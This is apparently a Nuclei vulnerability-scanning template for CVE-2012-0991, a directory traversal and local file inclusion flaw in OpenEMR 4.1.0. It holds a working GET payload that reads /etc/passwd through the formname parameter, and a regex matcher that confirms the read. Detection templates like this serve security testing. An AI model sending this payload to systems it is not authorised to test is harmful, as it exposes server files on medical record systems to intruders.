id: CVE-2012-0991 info: name: OpenEMR 4.1 - Local File Inclusion author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. reference: - https://www.exploit-db.com/exploits/36650 - https://www.cvedetails.com/cve/CVE-2012-0991 - http://web.archive.org/web/20210121221715/https://www.securityfocus.com/bid/51788/ - http://www.open-emr.org/wiki/index.php/OpenEMR_Patches classification: cve-id: CVE-2012-0991 tags: lfi,openemr,traversal,edb,cve,cve2012 requests: - method: GET path: - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/02/21